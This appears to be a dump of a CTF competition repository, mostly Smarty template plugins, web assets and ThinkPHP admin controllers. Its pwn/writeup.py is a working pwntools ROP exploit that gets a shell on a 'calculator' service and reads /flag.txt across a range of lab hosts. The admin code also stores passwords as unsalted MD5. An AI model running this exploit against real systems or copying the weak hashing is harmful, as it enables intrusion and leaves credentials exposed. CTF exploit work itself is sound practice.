| * @throws SmartyException 59 | */ 60 | static function registerDefaultTemplateHandler(Smarty $smarty, $callback) 61 | { 62 | if (is_callable($callback)) { 63 | 
$smarty->default_template_handler_func = $callback; 64 | } else { 65 | throw new SmartyException("Default template handler not callable"); 66 | } 67 | } 68 | 69 | /** 70 | * register config default handler 71 | * 72 | * @param Smarty $smarty 73 | * @param mixed $callback 74 | * 75 | * @throws SmartyException 76 | */ 77 | static function registerDefaultConfigHandler(Smarty $smarty, $callback) 78 | { 79 | if (is_callable($callback)) { 80 | $smarty->default_config_handler_func = $callback; 81 | } else { 82 | throw new SmartyException("Default config handler not callable"); 83 | } 84 | } 85 | } -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_filter_handler.php: -------------------------------------------------------------------------------- 1 | smarty->autoload_filters[$type])) { 38 | foreach ((array) $template->smarty->autoload_filters[$type] as $name) { 39 | $plugin_name = "Smarty_{$type}filter_{$name}"; 40 | if ($template->smarty->loadPlugin($plugin_name)) { 41 | if (function_exists($plugin_name)) { 42 | // use loaded Smarty2 style plugin 43 | $output = $plugin_name($output, $template); 44 | } elseif (class_exists($plugin_name, false)) { 45 | // loaded class of filter plugin 46 | $output = call_user_func(array($plugin_name, 'execute'), $output, $template); 47 | } 48 | } else { 49 | // nothing found, throw exception 50 | throw new SmartyException("Unable to load filter {$plugin_name}"); 51 | } 52 | } 53 | } 54 | // loop over registerd filters of specified type 55 | if (!empty($template->smarty->registered_filters[$type])) { 56 | foreach ($template->smarty->registered_filters[$type] as $key => $name) { 57 | if (is_array($template->smarty->registered_filters[$type][$key])) { 58 | $output = call_user_func($template->smarty->registered_filters[$type][$key], $output, $template); 59 | } else { 60 | $output = $template->smarty->registered_filters[$type][$key]($output, $template); 61 | 
} 62 | } 63 | } 64 | // return filtered output 65 | return $output; 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_get_include_path.php: -------------------------------------------------------------------------------- 1 | assign('{$_assign}' , {$_function} (" . var_export($_attr, true) . ",\$_smarty_tpl), true);?>"; 41 | } else { 42 | $_output .= "echo {$_function}(" . var_export($_attr, true) . ",\$_smarty_tpl);?>"; 43 | } 44 | $_tpl = $_template; 45 | while ($_tpl->parent instanceof Smarty_Internal_Template) { 46 | $_tpl = $_tpl->parent; 47 | } 48 | 49 | return "/*%%SmartyNocache:{$_tpl->properties['nocache_hash']}%%*/" . $_output . "/*/%%SmartyNocache:{$_tpl->properties['nocache_hash']}%%*/"; 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 30 | $this->data = $data; 31 | } 32 | 33 | /** 34 | * Return buffer content in parentheses 35 | * 36 | * @return string content 37 | */ 38 | public function to_smarty_php() 39 | { 40 | return sprintf("(%s)", $this->data); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree_dqcontent.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 30 | $this->data = $data; 31 | } 32 | 33 | /** 34 | * Return content as double quoted string 35 | * 36 | * @return string doubled quoted string 37 | */ 38 | public function to_smarty_php() 39 | { 40 | return '"' . $this->data . 
'"'; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree_tag.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 38 | $this->data = $data; 39 | $this->saved_block_nesting = $parser->block_nesting_level; 40 | } 41 | 42 | /** 43 | * Return buffer content 44 | * 45 | * @return string content 46 | */ 47 | public function to_smarty_php() 48 | { 49 | return $this->data; 50 | } 51 | 52 | /** 53 | * Return complied code that loads the evaluated output of buffer content into a temporary variable 54 | * 55 | * @return string template code 56 | */ 57 | public function assign_to_var() 58 | { 59 | $var = sprintf('$_tmp%d', ++ Smarty_Internal_Templateparser::$prefix_number); 60 | $tmp = $this->parser->compiler->appendCode('', $this->data); 61 | $tmp = $this->parser->compiler->appendCode($tmp, ""); 62 | $this->parser->compiler->prefix_code[] = sprintf("%s", $tmp); 63 | 64 | return $var; 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree_text.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 28 | $this->data = $data; 29 | } 30 | 31 | /** 32 | * Return buffer content 33 | * 34 | * @return string text 35 | */ 36 | public function to_smarty_php() 37 | { 38 | return $this->data; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_resource_stream.php: -------------------------------------------------------------------------------- 1 | resource, '://') !== false) { 33 | $source->filepath = $source->resource; 34 | } else { 35 | $source->filepath = str_replace(':', '://', $source->resource); 36 | } 37 | $source->uid = false; 38 | $source->content 
= $this->getContent($source); 39 | $source->timestamp = false; 40 | $source->exists = !!$source->content; 41 | } 42 | 43 | /** 44 | * Load template's source from stream into current template object 45 | * 46 | * @param Smarty_Template_Source $source source object 47 | * 48 | * @return string template source 49 | * @throws SmartyException if source cannot be loaded 50 | */ 51 | public function getContent(Smarty_Template_Source $source) 52 | { 53 | $t = ''; 54 | // the availability of the stream has already been checked in Smarty_Resource::fetch() 55 | $fp = fopen($source->filepath, 'r+'); 56 | if ($fp) { 57 | while (!feof($fp) && ($current_line = fgets($fp)) !== false) { 58 | $t .= $current_line; 59 | } 60 | fclose($fp); 61 | 62 | return $t; 63 | } else { 64 | return false; 65 | } 66 | } 67 | 68 | /** 69 | * modify resource_name according to resource handlers specifications 70 | * 71 | * @param Smarty $smarty Smarty instance 72 | * @param string $resource_name resource_name to make unique 73 | * @param boolean $isConfig flag for config resource 74 | * 75 | * @return string unique resource name 76 | */ 77 | public function buildUniqueResourceName(Smarty $smarty, $resource_name, $isConfig = false) 78 | { 79 | return get_class($this) . '#' . 
$resource_name; 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_resource_recompiled.php: -------------------------------------------------------------------------------- 1 | filepath = false; 37 | $compiled->timestamp = false; 38 | $compiled->exists = false; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_resource_uncompiled.php: -------------------------------------------------------------------------------- 1 | filepath = false; 45 | $compiled->timestamp = false; 46 | $compiled->exists = false; 47 | } 48 | 49 | /** 50 | * render compiled template code 51 | * 52 | * @param Smarty_Internal_Template $_template 53 | * 54 | * @return string 55 | * @throws Exception 56 | */ 57 | public function render($_template) 58 | { 59 | $level = ob_get_level(); 60 | ob_start(); 61 | try { 62 | $this->renderUncompiled($_template->source, $_template); 63 | return ob_get_clean(); 64 | } 65 | catch (Exception $e) { 66 | while (ob_get_level() > $level) { 67 | ob_end_clean(); 68 | } 69 | throw $e; 70 | } 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_undefined_variable.php: -------------------------------------------------------------------------------- 1 | value = $value; 41 | $this->nocache = $nocache; 42 | $this->scope = $scope; 43 | } 44 | 45 | /** 46 | * <> String conversion 47 | * 48 | * @return string 49 | */ 50 | public function __toString() 51 | { 52 | return (string) $this->value; 53 | } 54 | } 55 | 56 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smartycompilerexception.php: -------------------------------------------------------------------------------- 1 | Smarty Compiler: ' . $this->message . 
' <-- '; 13 | } 14 | 15 | /** 16 | * The line number of the template error 17 | * 18 | * @type int|null 19 | */ 20 | public $line = null; 21 | /** 22 | * The template source snippet relating to the error 23 | * 24 | * @type string|null 25 | */ 26 | public $source = null; 27 | /** 28 | * The raw text of the error message 29 | * 30 | * @type string|null 31 | */ 32 | public $desc = null; 33 | /** 34 | * The resource identifier or template name 35 | * 36 | * @type string|null 37 | */ 38 | public $template = null; 39 | } 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smartyexception.php: -------------------------------------------------------------------------------- 1 | Smarty: ' . (self::$escape ? htmlentities($this->message) : $this->message) . ' <-- '; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /easyWEB/web1/html/public/css/reset.css: -------------------------------------------------------------------------------- 1 | @charset "utf-8"; 2 | /* CSS Document */ 3 | /*Reset*/ 4 | *{box-sizing:content-box;} 5 | a:hover, a:focus{text-decoration:none;} 6 | body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;} 7 | table{border-collapse:collapse;border-spacing:0;} 8 | body{-webkit-text-size-adjust:none;} 9 | fieldset,img{border:0;} 10 | img{ vertical-align: top; max-width: 100%; } 11 | address,caption,cite,code,dfn,em,th,var{font-style:normal;font-weight:normal;} 12 | ol,ul{list-style:none;} 13 | caption,th{text-align:left;} 14 | h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;} 15 | q:before,q:after{content:'';} 16 | abbr,acronym {border:0;} 17 | .clearfix:after{visibility:hidden;display: block;font-size:0;content:" ";clear:both;height:0;} 18 | * html .clearfix{ zoom: 1; } /* IE6 */ 19 | *:first-child+html .clearfix { zoom: 1; } /* IE7 */ 20 | .cli{ clear:both; 
font-size:0; height:0; overflow:hidden;display:block;} 21 | .lclear{clear:left;font-size:0;height:0;overflow:hidden;} 22 | .fl{float:left;} 23 | .fr{float:right;} 24 | body{font-size:12px;font-family:'微软雅黑',"宋体","Arial Narrow",Helvetica,sans-serif;color:#000;line-height:1.2;text-align:left;} 25 | a{color:#333;text-decoration:none;} 26 | -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/background.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/background.jpg -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/bg.jpg -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/big.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/big.jpg -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/name.png -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/password.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/password.png -------------------------------------------------------------------------------- /easyWEB/web1/html/public/js/app.js: -------------------------------------------------------------------------------- 1 | /* ----------------------------------------------- 2 | /* How to use? : Check the GitHub README 3 | /* ----------------------------------------------- */ 4 | 5 | /* To load a config file (particles.json) you need to host this demo (MAMP/WAMP/local)... */ 6 | /* 7 | particlesJS.load('particles-js', 'particles.json', function() { 8 | console.log('particles.js loaded - callback'); 9 | }); 10 | */ 11 | 12 | /* Otherwise just put the config content (json): */ 13 | 14 | particlesJS('particles-js', 15 | 16 | { 17 | "particles": { 18 | "number": { 19 | "value": 40, 20 | "density": { 21 | "enable": true, 22 | "value_area": 800 23 | } 24 | }, 25 | "color": { 26 | "value": "#ffffff" 27 | }, 28 | "shape": { 29 | "type": "circle", 30 | "stroke": { 31 | "width": 0, 32 | "color": "#000000" 33 | }, 34 | "polygon": { 35 | "nb_sides": 5 36 | }, 37 | "image": { 38 | "src": "img/github.svg", 39 | "width": 100, 40 | "height": 100 41 | } 42 | }, 43 | "opacity": { 44 | "value": 0.7, 45 | "random": false, 46 | "anim": { 47 | "enable": false, 48 | "speed": 1, 49 | "opacity_min": 0.1, 50 | "sync": false 51 | } 52 | }, 53 | "size": { 54 | "value": 3, 55 | "random": true, 56 | "anim": { 57 | "enable": false, 58 | "speed": 40, 59 | "size_min": 0.1, 60 | "sync": false 61 | } 62 | }, 63 | "line_linked": { 64 | "enable": true, 65 | "distance": 150, 66 | "color": "#ffffff", 67 | "opacity": 0.6, 68 | "width": 1 69 | }, 70 | "move": { 71 | "enable": true, 72 | "speed": 6, 73 | "direction": "none", 74 | "random": false, 75 | "straight": false, 76 | "out_mode": "out", 77 | "bounce": false, 78 | "attract": { 79 | "enable": false, 80 | "rotateX": 600, 81 | 
"rotateY": 1200 82 | } 83 | } 84 | }, 85 | "interactivity": { 86 | "detect_on": "canvas", 87 | "events": { 88 | "onhover": { 89 | "enable": true, 90 | "mode": "grab" 91 | }, 92 | "onclick": { 93 | "enable": true, 94 | "mode": "push" 95 | }, 96 | "resize": true 97 | }, 98 | "modes": { 99 | "grab": { 100 | "distance": 200, 101 | "line_linked": { 102 | "opacity": 1 103 | } 104 | }, 105 | "bubble": { 106 | "distance": 400, 107 | "size": 40, 108 | "duration": 2, 109 | "opacity": 8, 110 | "speed": 3 111 | }, 112 | "repulse": { 113 | "distance": 200, 114 | "duration": 0.4 115 | }, 116 | "push": { 117 | "particles_nb": 4 118 | }, 119 | "remove": { 120 | "particles_nb": 2 121 | } 122 | } 123 | }, 124 | "retina_detect": false 125 | } 126 | 127 | ); -------------------------------------------------------------------------------- /easyWEB/web1/html/public/js/npm.js: -------------------------------------------------------------------------------- 1 | // This file is autogenerated via the `commonjs` Grunt task. You can require() this file in a CommonJS environment. 
2 | require('../../js/transition.js') 3 | require('../../js/alert.js') 4 | require('../../js/button.js') 5 | require('../../js/carousel.js') 6 | require('../../js/collapse.js') 7 | require('../../js/dropdown.js') 8 | require('../../js/modal.js') 9 | require('../../js/tooltip.js') 10 | require('../../js/popover.js') 11 | require('../../js/scrollspy.js') 12 | require('../../js/tab.js') 13 | require('../../js/affix.js') -------------------------------------------------------------------------------- /easyWEB/web1/html/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | nodaemon=true 3 | 4 | [rpcinterface:supervisor] 5 | supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface 6 | 7 | [unix_http_server] 8 | file=/tmp/supervisor.sock 9 | 10 | [supervisorctl] 11 | serverurl=unix:///tmp/supervisor.sock 12 | 13 | [program:apache2] 14 | command=/bin/bash -c "source /etc/apache2/envvars && exec /usr/sbin/apache2 -DFOREGROUND" 15 | 16 | [program:mysql] 17 | command = /usr/bin/mysqld_safe 18 | -------------------------------------------------------------------------------- /easyWEB/web1/html/templates/error.tpl: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 星球管理系统 9 | 10 | 11 | 12 | 13 | 22 | 23 | 24 |
25 | 26 | Warning! Something wrong,check again! 27 |
28 | 29 | -------------------------------------------------------------------------------- /easyWEB/web1/html/templates/success.tpl: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 星球管理系统 9 | 10 | 11 | 12 | 13 | 22 | 23 | 24 |
25 | 26 | successful!your oprating is ok! 27 |
28 | 29 | -------------------------------------------------------------------------------- /easyWEB/web1/html/templates/updatepass.tpl: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 学生会-简历系统 9 | 10 | 11 | 12 | 13 | 55 | 56 | 57 | 64 | 65 | -------------------------------------------------------------------------------- /easyWEB/writeup.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/writeup.pdf -------------------------------------------------------------------------------- /pwn/calculator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/pwn/calculator -------------------------------------------------------------------------------- /pwn/calculator.bak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/pwn/calculator.bak -------------------------------------------------------------------------------- /pwn/writeup.py: --------------------------------------------------------------------------------
from pwn import *
import requests
import time
import re
# NOTE(review): requests and re are not referenced anywhere in this script.


def main(ip):
    """Run the scripted session against the calculator service on ip:10000.

    Connects, reads symbol addresses from a local copy of the binary, feeds a
    fixed sequence of numbers through menu option 1, selects option 5, then
    sends a shell command and returns whatever the service answers.

    NOTE(review): Python 2 only (print statements, str passed to u64).
    NOTE(review): every address used below is either a constant or read from
    the local ELF, so the script presumably relies on the target being the
    same build loaded at a fixed base -- confirm. For whoever maintains the
    service, the hardening worth checking is presumably a bound on the
    accepted entry count, stack protection and position-independent loading.
    """
    p=remote(ip,10000)

    # Local copy of the target binary, used only to look up symbol addresses.
    elf=ELF('./calculator')

    system_addr=elf.symbols['system']
    # Hard-coded addresses; what each one points at is inferred from the
    # variable names only -- verify against the binary.
    binsh_addr=0x006020A0
    poprdi=0x00400ec3
    poprsi=0x400ec1
    frmst_addr=0x400FD2
    scanf_plt=elf.symbols['__isoc99_scanf']
    #context.log_level='debug'
    def fillchar(payload):
        """Submit one menu-option-1 entry with x=payload and y=0."""
        p.recvuntil('operation:\n\n')
        p.sendline('1')
        p.recvuntil('x:\n')
        p.sendline(str(payload))
        p.recvuntil('y:\n')
        p.sendline('0')

    def sendpayload(payload):
        """Submit payload as x with y=0, then a second entry with x=0 and y=0."""
        p.recvuntil('operation:\n\n')
        p.sendline('1')
        p.recvuntil('x:\n')
        p.sendline(str(payload))
        p.recvuntil('y:\n')
        p.sendline('0')
        p.recvuntil('operation:\n\n')
        p.sendline('1')
        p.recvuntil('x:\n')
        p.sendline('0')
        p.recvuntil('y:\n')
        p.sendline('0')


    def savepayload():
        """Select menu option 5."""
        p.recvuntil('operation:\n\n')
        p.sendline('5')


    def exp():
        """Announce 100 calculations, then submit 62 zero entries."""
        p.recvuntil('calculations:')
        p.sendline(str(100))
        for i in range(62):
            fillchar(0)


    #sendpayload(0x400a1f)
    #gdb.attach(p)
    exp()
    # Values submitted after the filler entries, in order; each goes through
    # sendpayload(), so each is followed by an all-zero entry.
    sendpayload(poprdi)
    sendpayload(frmst_addr)
    sendpayload(poprsi)
    sendpayload(binsh_addr)
    sendpayload(0)
    #0.&a.shu
    sendpayload(scanf_plt)

    sendpayload(poprdi)
    sendpayload(binsh_addr)
    sendpayload(system_addr)
    savepayload()

    # Pack 'sh' padded with NUL bytes to 8 bytes into an integer and send it
    # as decimal text.
    binsh='sh'+'\x00'
    print len(binsh)
    binsh=binsh.ljust(8,'\x00')
    print len(binsh)
    dudu=u64(binsh)

    p.send(str(dudu))

    p.sendline('\n')
    p.sendline('cat /flag.txt')
    # A single recv(): the return value is whatever arrived first, which is
    # not guaranteed to be the complete answer.
    flag=p.recv()
    return flag

    # NOTE(review): unreachable -- the function has already returned, so the
    # connection is never closed explicitly.
    p.close()


# Calls main() for 172.20.101.101 through 172.20.124.101, one host at a time.
for i in range(101,125):
    try:
        ip='172.20.{}.101'.format(str(i))
        flag=main(ip)
        print ip,flag
        # Only reached when main() returned; a failed host skips the pause.
        time.sleep(11)
    # NOTE(review): the bare except reports every failure, whatever its
    # cause, as 'wrong'.
    except:
        print 'wrong'
-------------------------------------------------------------------------------- /thinkPHP/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | composer.lock 3 | *.log 4 | thinkphp 5 | -------------------------------------------------------------------------------- /thinkPHP/LICENSE.txt: -------------------------------------------------------------------------------- 1 | 2 | ThinkPHP遵循Apache2开源协议发布,并提供免费使用。 3 | 版权所有Copyright © 2006-2016 by ThinkPHP (http://thinkphp.cn) 4 | All rights reserved。 5 | ThinkPHP® 商标和著作权所有者为上海顶想信息科技有限公司。 6 | 7 | Apache Licence是著名的非盈利开源组织Apache采用的协议。 8 | 该协议和BSD类似,鼓励代码共享和尊重原作者的著作权, 9 | 
允许代码修改,再作为开源或商业软件发布。需要满足 10 | 的条件: 11 | 1. 需要给代码的用户一份Apache Licence ; 12 | 2. 如果你修改了代码,需要在被修改的文件中说明; 13 | 3. 在延伸的代码中(修改和有源代码衍生的代码中)需要 14 | 带有原来代码中的协议,商标,专利声明和其他原来作者规 15 | 定需要包含的说明; 16 | 4. 如果再发布的产品中包含一个Notice文件,则在Notice文 17 | 件中需要带有本协议内容。你可以在Notice中增加自己的 18 | 许可,但不可以表现为对Apache Licence构成更改。 19 | 具体的协议参考:http://www.apache.org/licenses/LICENSE-2.0 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 22 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 23 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 24 | FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE 25 | COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, 26 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, 27 | BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 28 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 29 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 30 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN 31 | ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 32 | POSSIBILITY OF SUCH DAMAGE. 
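33 | -------------------------------------------------------------------------------- /thinkPHP/application/.htaccess: -------------------------------------------------------------------------------- 1 | deny from all -------------------------------------------------------------------------------- /thinkPHP/application/admin/config.php: -------------------------------------------------------------------------------- 1 | [ 5 | '__PUBLIC__'=>SITE_URL.'/static/admin', 6 | '__IMG__'=>SITE_URL.'/static', 7 | ], 8 | 9 | 'template' => [ 10 | // 模板后缀 11 | 'view_suffix' => 'htm', 12 | ], 13 | 14 | 15 | 16 | ]; 17 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Admin.php: -------------------------------------------------------------------------------- 1 | assign('list',$list); 13 | return $this->fetch(); 14 | } 15 |
    /**
     * Show the "add administrator" form, or create the account on POST.
     *
     * On POST the submitted username and password are validated with the
     * 'add' scene of the Admin validator and then inserted into the admin
     * table. The password is stored as md5(password), the same form edit()
     * writes and the login model compares against; the previous version
     * stored the submitted value unchanged.
     *
     * NOTE(review): unsalted MD5 is kept only so that accounts created here
     * match what edit() and the login check use. password_hash() with
     * password_verify() is the durable fix, but every place that writes or
     * checks the column has to change together.
     *
     * @return mixed rendered form, or the framework's success/error response
     */
    public function add()
    {
        if(!request()->isPost()){
            return $this->fetch();
        }

        $data=[
            'username'=>input('username'),
            'password'=>input('password'),
        ];
        // Validate the raw values first: md5('') is a non-empty string and
        // would get past the validator's "require" rule on password.
        $validate = \think\Loader::validate('Admin');
        if(!$validate->scene('add')->check($data)){
            $this->error($validate->getError()); die;
        }
        $data['password']=md5($data['password']);
        if(db('admin')->insert($data)){
            return $this->success('添加管理员成功!','lst');
        }
        return $this->error('添加管理员失败!');
    }
37 | 38 | public function edit(){ 39 | $id=input('id'); 40 | $admins=db('admin')->find($id); 41 | if(request()->isPost()){ 42 | $data=[ 43 | 'id'=>input('id'), 44 | 'username'=>input('username'), 45 | ]; 46 | if(input('password')){ 47 | $data['password']=md5(input('password')); 48 | }else{ 49 | $data['password']=$admins['password']; 50 | } 51 | $validate = \think\Loader::validate('Admin'); 52 | if(!$validate->scene('edit')->check($data)){ 53 | $this->error($validate->getError()); die; 54 | } 55 | $save=db('admin')->update($data); 56 | if($save !== false){ 57 | 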
$this->success('修改管理员成功!','lst'); 58 | }else{ 59 | $this->error('修改管理员失败!'); 60 | } 61 | return; 62 | } 63 | $this->assign('admins',$admins); 64 | return $this->fetch(); 65 | } 66 | 67 | public function del(){ 68 | $id=input('id'); 69 | if($id != 2){ 70 | if(db('admin')->delete(input('id'))){ 71 | $this->success('删除管理员成功!','lst'); 72 | }else{ 73 | $this->error('删除管理员失败!'); 74 | } 75 | }else{ 76 | $this->error('初始化管理员不能删除!'); 77 | } 78 | 79 | } 80 | 81 | public function logout(){ 82 | session(null); 83 | $this->success('退出成功!','Login/index'); 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Base.php: -------------------------------------------------------------------------------- 1 | error('请先登录系统!','Login/index'); 9 | } 10 | } 11 | } -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Cate.php: -------------------------------------------------------------------------------- 1 | assign('list',$list); 11 | return $this->fetch(); 12 | } 13 | 14 | public function add() 15 | { 16 | if(request()->isPost()){ 17 | 18 | $data=[ 19 | 'catename'=>input('catename'), 20 | ]; 21 | $validate = \think\Loader::validate('Cate'); 22 | if(!$validate->scene('add')->check($data)){ 23 | $this->error($validate->getError()); die; 24 | } 25 | if(db('cate')->insert($data)){ 26 | return $this->success('添加栏目成功!','lst'); 27 | }else{ 28 | return $this->error('添加栏目失败!'); 29 | } 30 | return; 31 | } 32 | return $this->fetch(); 33 | } 34 | 35 | public function edit(){ 36 | $id=input('id'); 37 | $cates=db('cate')->find($id); 38 | if(request()->isPost()){ 39 | $data=[ 40 | 'id'=>input('id'), 41 | 'catename'=>input('catename'), 42 | ]; 43 | $validate = \think\Loader::validate('cate'); 44 | if(!$validate->scene('edit')->check($data)){ 45 | $this->error($validate->getError()); die; 46 | } 47 | $save=db('cate')->update($data); 48 | if($save !== 
false){ 49 | $this->success('修改栏目成功!','lst'); 50 | }else{ 51 | $this->error('修改栏目失败!'); 52 | } 53 | return; 54 | } 55 | $this->assign('cates',$cates); 56 | return $this->fetch(); 57 | } 58 | 59 | public function del(){ 60 | $id=input('id'); 61 | if($id != 2){ 62 | if(db('cate')->delete(input('id'))){ 63 | $this->success('删除栏目成功!','lst'); 64 | }else{ 65 | $this->error('删除栏目失败!'); 66 | } 67 | }else{ 68 | $this->error('初始化栏目不能删除!'); 69 | } 70 | 71 | } 72 | 73 | 74 | 75 | } 76 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Index.php: -------------------------------------------------------------------------------- 1 | fetch(); 11 | } 12 | 13 | 14 | 15 | } 16 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Links.php: -------------------------------------------------------------------------------- 1 | assign('list',$list); 11 | return $this->fetch(); 12 | } 13 | 14 | public function add() 15 | { 16 | if(request()->isPost()){ 17 | 18 | $data=[ 19 | 'title'=>input('title'), 20 | 'url'=>input('url'), 21 | 'desc'=>input('desc'), 22 | ]; 23 | $validate = \think\Loader::validate('Links'); 24 | if(!$validate->scene('add')->check($data)){ 25 | $this->error($validate->getError()); die; 26 | } 27 | if(db('Links')->insert($data)){ 28 | return $this->success('添加链接成功!','lst'); 29 | }else{ 30 | return $this->error('添加链接失败!'); 31 | } 32 | return; 33 | } 34 | return $this->fetch(); 35 | } 36 | 37 | public function edit(){ 38 | $id=input('id'); 39 | $Links=db('Links')->find($id); 40 | if(request()->isPost()){ 41 | $data=[ 42 | 'id'=>input('id'), 43 | 'title'=>input('title'), 44 | 'url'=>input('url'), 45 | 'desc'=>input('desc'), 46 | ]; 47 | $validate = \think\Loader::validate('Links'); 48 | if(!$validate->scene('edit')->check($data)){ 49 | $this->error($validate->getError()); die; 50 | } 51 | if(db('Links')->update($data)){ 52 | 
$this->success('修改链接成功!','lst'); 53 | }else{ 54 | $this->error('修改链接失败!'); 55 | } 56 | return; 57 | } 58 | $this->assign('Links',$Links); 59 | return $this->fetch(); 60 | } 61 | 62 | public function del(){ 63 | $id=input('id'); 64 | if(db('Links')->delete(input('id'))){ 65 | $this->success('删除链接成功!','lst'); 66 | }else{ 67 | $this->error('删除链接失败!'); 68 | } 69 | 70 | } 71 | 72 | 73 | 74 | } 75 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Login.php: -------------------------------------------------------------------------------- 1 | isPost()){ 10 | $admin=new Admin(); 11 | $data=input('post.'); 12 | $num=$admin->login($data); 13 | if($num==3){ 14 | $this->success('信息正确,正在为您跳转...','index/index'); 15 | }elseif($num==4){ 16 | $this->error('验证码错误'); 17 | } 18 | else{ 19 | $this->error('用户名或者密码错误'); 20 | } 21 | 22 | } 23 | return $this->fetch('login'); 24 | } 25 | 26 | 27 | 28 | 29 | 30 | } 31 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/model/Admin.php: -------------------------------------------------------------------------------- 1 | check($data['code'])) { 11 | return 4; 12 | } 13 | $user=Db::name('admin')->where('username','=',$data['username'])->find(); 14 | if($user){ 15 | if($user['password'] == md5($data['password'])){ 16 | session('username',$user['username']); 17 | session('uid',$user['id']); 18 | return 3; //信息正确 19 | }else{ 20 | return 2; //密码错误 21 | } 22 | }else{ 23 | return 1; //用户不存在 24 | } 25 | } 26 | 27 | } 28 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/model/Article.php: -------------------------------------------------------------------------------- 1 | belongsTo('cate','cateid'); 9 | } 10 | 11 | 12 | 13 | } 14 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/model/Cate.php: 
